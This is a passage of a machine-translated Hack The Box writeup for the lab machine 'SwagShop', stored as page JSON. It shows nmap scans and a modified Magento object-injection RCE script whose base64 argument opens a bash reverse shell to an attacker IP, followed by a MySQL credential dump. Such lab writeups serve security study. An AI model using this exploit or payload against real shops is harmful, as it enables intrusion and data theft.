{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-swagshop-en","result":{"data":{"markdownRemark":{"id":"3ef54427-c2a7-5a19-a706-fa934b4475b9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-swagshop\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy current rank on Hack The Box is ProHacker at the time of writing.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/11a078ffa841e1eca64bd701cc6c75d5/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABYElEQVQY0zWPTU8aURSG51903027sVFGLDD3DnOZGWAIDBFwEBSQgB8xxbaZaiIorbW7rtqF6arpsolbF/0J/VX38apx8eYkJ3mf8xzryzzl/PREf56/J9nuUmt1qbe7NJMd2v0h/b0ptc0E4VdR1QZviwEqinH8CBnWEEFEVpawHU+bYN3+udR3f7/z/99vrpYpk+MPpOcLDmcfmaVnLK6uGU4PUY0WncHYHExo9wZMD/bZHo4ZTA7IeeEDkHXha2v5NebHz7n+dXPNt+Un4mSPnfERXqVJsRwz2p+hwgbrcZ9MsMmaV0cGJdKRQHhFwsBlNa+wC1Kv5mysZvelnryLuFiMmIw7+B2Hek9R7giiXoH6rkvQkjhll/JWHllzTbnEhlTGSJl3jZnjs1awCZIX2lrJvDKL19r1NsgKSSEUTwkkomJAFcfAJLmSi6yaqR6Axsh5jvcIzuSlfpO1uQeYccDi4gkwUgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/11a078ffa841e1eca64bd701cc6c75d5/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/11a078ffa841e1eca64bd701cc6c75d5/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/11a078ffa841e1eca64bd701cc6c75d5/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the HackTheBox retired machine “SwagShop.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote any actions that violate social order.</strong></p>\n<p>Please note in advance that attempting to attack environments you do not own or have not been authorized to access may violate the ‘Act on Prohibition of Unauthorized Computer Access’ (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#obtaining-user-including-root\">Obtaining User (including root)</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>Starting with the usual enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># ターゲットマシンのIPをHOSTSに追加して高速スキャ</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.140  $RHOST/g'</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 1717 appears to be open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT     STATE    SERVICE  VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>     <span class=\"token function\">ssh</span>      OpenSSH <span class=\"token number\">7</span>.2p2 Ubuntu 4ubuntu2.8 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>     http     Apache httpd <span class=\"token number\">2.4</span>.18 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Ubuntu<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Did not follow redirect to http://swagshop.htb/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.18 <span class=\"token punctuation\">(</span>Ubuntu<span class=\"token punctuation\">)</span>\n<span class=\"token number\">1717</span>/tcp filtered fj-hdnet\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>I’m not sure what service is running on port 1717, but connecting to port 80 shows what appears to be an e-commerce site.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 777px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAABqklEQVQ4y52R7WoTURCGz11of9iUdtWitYmWtE1qK4UWFX8I3lgtVC9CewONtImgoGChNEoKu4kKmgQSWLb7lf3K456TEvJD28SB98ywO+fZd2dEZkZj+e4iD3J5FrN5ZmfnyczcYk67w3RG49r1G0xNTY8tcTNbYD5XYGF5k4ePX7D06Cn3ClvcX39Ccfs5+c1n3F7aYC5bRMutoWUvl1jZOWBlr8La3hEbr8tK66+OKOyWKO6+U3n1ZdqT9q3uDPK/aplF3fTRP5U5Pv3GR/03n41ffPnexjB7NKyQuhWoPK4E9OHDG+z6V85qNWqnJzR//gAS/idEnCR4UUIYJ0RxPHyR9PvEyeQSQRDQajZpt9s0Wy0c1xkA0w/1U+ikEr7v0+l06Ha7tFKorE3THDqdGCgPBUvdndvnWJaFbdt4vkcv6E0MFfJCo9GgUnmvHoRhiByDhMl6QLzQOEuRh27oHJYP1dw8z03lDWU7NvHFssZ2qBsGB6WSuiRdRVE0zBImG0eBVzqsVqu83d9XzXJ+juPguq7SKGxkU5cDpRP5e3+LUVdXuZPxBy4mx3pAAzzGAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/edfce11408043310b57600d121f1febb/8ac56/image-20220811214853593.webp 240w,\n/static/edfce11408043310b57600d121f1febb/d3be9/image-20220811214853593.webp 480w,\n/static/edfce11408043310b57600d121f1febb/2e4ba/image-20220811214853593.webp 777w\"\n              sizes=\"(max-width: 777px) 100vw, 777px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/edfce11408043310b57600d121f1febb/8ff5a/image-20220811214853593.png 240w,\n/static/edfce11408043310b57600d121f1febb/e85cb/image-20220811214853593.png 480w,\n/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png 777w\"\n            sizes=\"(max-width: 777px) 100vw, 777px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/edfce11408043310b57600d121f1febb/108f8/image-20220811214853593.png\"\n            alt=\"image-20220811214853593\"\n            title=\"image-20220811214853593\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The running service appears to be <code class=\"language-text\">Magento, Varien, E-commerce</code>.</p>\n<p>Searching for exploits revealed the following three:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit -m xml/webapps/37977.py\n$ searchsploit -m php/webapps/50896.txt\n$ searchsploit -m php/webapps/19793.txt</code></pre></div>\n<p>After trying the <code class=\"language-text\">37977.py</code> exploit, I was able to log into what appears to be the Magento admin panel.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/89048/image-20220812224414951.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 82.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACwUlEQVQ4y42TW08TQRTH94P4gDewxbTcGhSDF2LUBoGoD6iJMTHxxQdjwpOfycRvQFTERCkt9EJpoaVcKi1772532+5u+/fMtOWWkjjJL+d0ZvY//zlzKvQNBHGpfwj+4XGOLzCG4fG7GBy9jYFACFf9QwiOTSA0cQ+3Jqco3sf1myO4NjiMK74gLt8IoK/fj/7BIPxDIQgvnkzi9csZTD5/hTvP5uF/+BS+qTB8D8Lws0hMv32PNx8X8G7hM+Y/fELw8SwCj2YoziFIcTQ8g9D0HEbCsxBK0a8Qo1+wFv2GtdgPJGKLSK4vIZlYPobNr8W+I0Z7ViOLiNN6Kv4TKYoJlid/IZtiLENwjQNY8hZMJQ9NLqCmF9BqHKHlSIRIuQhQfowr8zXPLnGcWhkN6xBNuwjU/0JwTBVOtQLXa8JrNuG4hOO2cV24rkfxFJ01Nu963kn02t8KWsVAIruN1VQaS5EoVpIb+J1IoSRKqNVsiJIEy7ZQr9dRI+oNRoPnJ9Rob40OciCYVQv5gyKyhT38WY8jnd/hKLqOuuvAsG1UabNJsKhXTWiG0Z6jNbZP1TXoBt2SbiTohonkVg6xdIY7XN3YRITciooKNlotnBme53EnvUazya9cQXangNzuPrZ2djnrJCrKSkewdYbuOD/P6Aga2NjOI0Oi8UyW13OFaliW5As/vAguaFA98oVdciSjdCTisFxGsVSCWa0eC/7v4II6OcySYH6/yCNzms61H6W76cTFqfzM/CmHKn2Y2MxQDffo6jlOnH5L9CjMnCGXYFVU3qO2Rk1MLeJQ22jlPR4bREVT+EOxBxPYpE191n1OdjI6p9nUFhUqiSiKkKkksiJDURSORWsNEml0RBlcsFujXvZVTYOiqtDpFl0UEpao2VmuqtR/egUSP6ztUmj2qEVXkG04D/tHMOe91pjDfyqEcTDMWIyKAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/8ac56/image-20220812224414951.webp 240w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d3be9/image-20220812224414951.webp 480w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/e46b2/image-20220812224414951.webp 960w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/a3537/image-20220812224414951.webp 1242w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/8ff5a/image-20220812224414951.png 240w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/e85cb/image-20220812224414951.png 480w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d9199/image-20220812224414951.png 960w,\n/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/89048/image-20220812224414951.png 1242w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7832ec61cf4551ebf59fb3b3a3b5dfd7/d9199/image-20220812224414951.png\"\n            alt=\"image-20220812224414951\"\n            title=\"image-20220812224414951\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The portal information revealed the version is 1.9.0, so I used the following exploit.</p>\n<p>os.environ[‘PYGAME<em>HIDE</em>SUPPORT_PROMPT’] = ‘hide’<a href=\"https://gist.github.com/Mah1ndra/b15db547dfff13696ddd4236dd238e45\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Magento CE &#x3C; 1.9.0.1 - (Authenticated) Remote Code Execution : php/webapps/37811.py · GitHub</a></p>\n<p>However, I couldn’t get a reverse shell with the original code, so I modified it slightly.</p>\n<p>I was ultimately able to get a shell with the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token shebang important\">#!/usr/bin/python</span>\n<span class=\"token comment\"># Exploit Title: Magento CE &lt; 1.9.0.1 Post Auth RCE </span>\n<span class=\"token comment\"># Google Dork: \"Powered by Magento\"</span>\n<span class=\"token comment\"># Date: 08/18/2015</span>\n<span class=\"token comment\"># Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com</span>\n<span class=\"token comment\"># Vendor Homepage: http://magento.com/</span>\n<span class=\"token comment\"># Software Link: https://www.magentocommerce.com/download</span>\n<span class=\"token comment\"># Version: 1.9.0.1 and below</span>\n<span class=\"token comment\"># Tested on: Ubuntu 15</span>\n<span class=\"token comment\"># CVE : none</span>\n\nfrom hashlib <span class=\"token function\">import</span> md5\n<span class=\"token function\">import</span> sys\n<span class=\"token function\">import</span> re\n<span class=\"token function\">import</span> base64\n<span class=\"token function\">import</span> mechanize\n\n\n<span class=\"token comment\"># Command-line args</span>\ntarget <span class=\"token operator\">=</span> <span class=\"token string\">\"http://swagshop.htb/index.php/admin/dashboard/index/key/82a57578bfedeb8b93faded780acce0d/\"</span>\nbase <span class=\"token operator\">=</span> <span class=\"token string\">\"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQ0NCAwPiYxCg==\"</span>\narg <span class=\"token operator\">=</span> <span class=\"token string\">\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQ0NCAwPiYxCg==' | base64 -d | /bin/bash\"</span>\n\n<span class=\"token comment\"># Config.</span>\nusername <span class=\"token operator\">=</span> <span class=\"token string\">'forme'</span>\npassword <span class=\"token operator\">=</span> <span class=\"token string\">'forme'</span>\nphp_function <span class=\"token operator\">=</span> <span class=\"token string\">'system'</span>  <span class=\"token comment\"># Note: we can only pass 1 argument to the function</span>\ninstall_date <span class=\"token operator\">=</span> <span class=\"token string\">'Wed, 08 May 2019 07:23:09 +0000'</span>  <span class=\"token comment\"># This needs to be the exact date from /app/etc/local.xml</span>\n\n<span class=\"token comment\"># POP chain to pivot into call_user_exec</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">'O:8:\\\"Zend_Log\\\":1:{s:11:\\\"\\00*\\00_writers\\\";a:2:{i:0;O:20:\\\"Zend_Log_Writer_Mail\\\":4:{s:16:'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'\\\"\\00*\\00_eventsToMail\\\";a:3:{i:0;s:11:\\\"EXTERMINATE\\\";i:1;s:12:\\\"EXTERMINATE!\\\";i:2;s:15:\\\"'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'EXTERMINATE!!!!\\\";}s:22:\\\"\\00*\\00_subjectPrependText\\\";N;s:10:\\\"\\00*\\00_layout\\\";O:23:\\\"'</span>     <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'Zend_Config_Writer_Yaml\\\":3:{s:15:\\\"\\00*\\00_yamlEncoder\\\";s:%d:\\\"%s\\\";s:17:\\\"\\00*\\00'</span>     <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">'_loadedSection\\\";N;s:10:\\\"\\00*\\00_config\\\";O:13:\\\"Varien_Object\\\":1:{s:8:\\\"\\00*\\00_data\\\"'</span> <span class=\"token punctuation\">\\</span>\n          <span class=\"token string\">';s:%d:\\\"%s\\\";}}s:8:\\\"\\00*\\00_mail\\\";O:9:\\\"Zend_Mail\\\":0:{}}i:1;i:2;}}'</span> % <span class=\"token punctuation\">(</span>len<span class=\"token punctuation\">(</span>php_function<span class=\"token punctuation\">)</span>, php_function,\n                                                                                     len<span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">)</span>, arg<span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># Setup the mechanize browser and options</span>\nbr <span class=\"token operator\">=</span> mechanize.Browser<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># br.set_proxies({\"http\": \"localhost:8080\"})</span>\nbr.set_handle_robots<span class=\"token punctuation\">(</span>False<span class=\"token punctuation\">)</span>\n\nrequest <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>target<span class=\"token punctuation\">)</span>\n\nbr.select_form<span class=\"token punctuation\">(</span>nr<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\">#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.</span>\nbr.form.fixup<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nbr<span class=\"token punctuation\">[</span><span class=\"token string\">'login[username]'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> username\nbr<span class=\"token punctuation\">[</span><span class=\"token string\">'login[password]'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> password\n\nbr.method <span class=\"token operator\">=</span> <span class=\"token string\">\"POST\"</span>\nrequest <span class=\"token operator\">=</span> br.submit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ncontent <span class=\"token operator\">=</span> request.read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># print(content)</span>\n\nurl <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"ajaxBlockUrl = \\'(.*)\\'\"</span>, content<span class=\"token punctuation\">)</span>\nurl <span class=\"token operator\">=</span> url.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nkey <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"var FORM_KEY = '(.*)'\"</span>, content<span class=\"token punctuation\">)</span>\nkey <span class=\"token operator\">=</span> key.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\nrequest <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>url + <span class=\"token string\">'block/tab_orders/period/2y/?isAjax=true'</span>, <span class=\"token assign-left variable\">data</span><span class=\"token operator\">=</span><span class=\"token string\">'isAjax=false&amp;form_key='</span> + key<span class=\"token punctuation\">)</span>\ntunnel <span class=\"token operator\">=</span> re.search<span class=\"token punctuation\">(</span><span class=\"token string\">\"src=<span class=\"token entity\" title=\"\\&quot;\">\\\"</span>(.*)\\?ga=\"</span>, request.read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">))</span>\ntunnel <span class=\"token operator\">=</span> tunnel.group<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> base64.b64encode<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ngh <span class=\"token operator\">=</span> md5<span class=\"token punctuation\">(</span>payload + install_date<span class=\"token punctuation\">)</span>.hexdigest<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nexploit <span class=\"token operator\">=</span> tunnel + <span class=\"token string\">'?ga='</span> + payload + <span class=\"token string\">'&amp;h='</span> + gh\n\ntry:\n    request <span class=\"token operator\">=</span> br.open<span class=\"token punctuation\">(</span>exploit<span class=\"token punctuation\">)</span>\nexcept <span class=\"token punctuation\">(</span>mechanize.HTTPError, mechanize.URLError<span class=\"token punctuation\">)</span> as e:\n    print e.read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>However, I only have www-data privileges at this point, so I need to escalate to a user.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 813px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 29.166666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVQY04WQW26DMBBF2Q41hvDGgI3NI2CHkKjd/1puBzeK1I+qH0djW9aZOxN0esIwO8JimCyE1FB6gDEGSvWY59EzTQbjqLEsE7btCm0UiqJAlqaIIkZEvgbufofbdxzPB/bjoI8GmoRtK1DXBURToq5yVGX2pqG3PL8gYiF49PEm5iTcbxbbusC5ldhwO+929WnmZYShKtoGUna+yaAV1CBJWiPLMhLnlJQoC/CYk3B3sCQ6q3MWVy/f/GhaS3SdQJpewDn3JEmCOI5/kZwksR87+Px6UBqDvu/Q9T8ppOxRVSUlSH2K8yN77Ykx9icRI6ExmhY+es6zUtI3EEJQkxY1jRaG4Wvp//MNLevHIA9bcgYAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e152c4388960d12645662c44c276bc8f/8ac56/image-20220812233949620.webp 240w,\n/static/e152c4388960d12645662c44c276bc8f/d3be9/image-20220812233949620.webp 480w,\n/static/e152c4388960d12645662c44c276bc8f/90602/image-20220812233949620.webp 813w\"\n              sizes=\"(max-width: 813px) 100vw, 813px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e152c4388960d12645662c44c276bc8f/8ff5a/image-20220812233949620.png 240w,\n/static/e152c4388960d12645662c44c276bc8f/e85cb/image-20220812233949620.png 480w,\n/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png 813w\"\n            sizes=\"(max-width: 813px) 100vw, 813px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e152c4388960d12645662c44c276bc8f/baaa6/image-20220812233949620.png\"\n            alt=\"image-20220812233949620\"\n            title=\"image-20220812233949620\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"obtaining-user-including-root\" style=\"position:relative;\"><a href=\"#obtaining-user-including-root\" aria-label=\"obtaining user including root permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Obtaining User (including root)</h2>\n<p>I logged into MySQL using credentials extracted from config.php and dumped the user table, where I found a user named ‘haris’.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9f71cc4238ff25cc37651049c7e23580/3f8aa/image-20220812235356430.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArklEQVQY01WQaRaDIAyEOZFYcGFHRKv2/veZktjX1/742JLMJAhrDYyZYe2MaRqhtYJSClJKvqeUEGNEzqnFNL/3fd+QfO667g8xjgOcsxgGzXhvQSYkFoLHvm/YtsrEGDjXe4cQPe9k8ougJQQH5+1XzDrDycuSGpk5zyeu62Ber6MZVaaUO76uhacQSj2aq2Hn2UygjgkanURTuselAoIESKjWgpRj+y5zN/HhDVXWhe59aBYqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9f71cc4238ff25cc37651049c7e23580/8ac56/image-20220812235356430.webp 240w,\n/static/9f71cc4238ff25cc37651049c7e23580/d3be9/image-20220812235356430.webp 480w,\n/static/9f71cc4238ff25cc37651049c7e23580/e46b2/image-20220812235356430.webp 960w,\n/static/9f71cc4238ff25cc37651049c7e23580/c6c08/image-20220812235356430.webp 1337w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9f71cc4238ff25cc37651049c7e23580/8ff5a/image-20220812235356430.png 240w,\n/static/9f71cc4238ff25cc37651049c7e23580/e85cb/image-20220812235356430.png 480w,\n/static/9f71cc4238ff25cc37651049c7e23580/d9199/image-20220812235356430.png 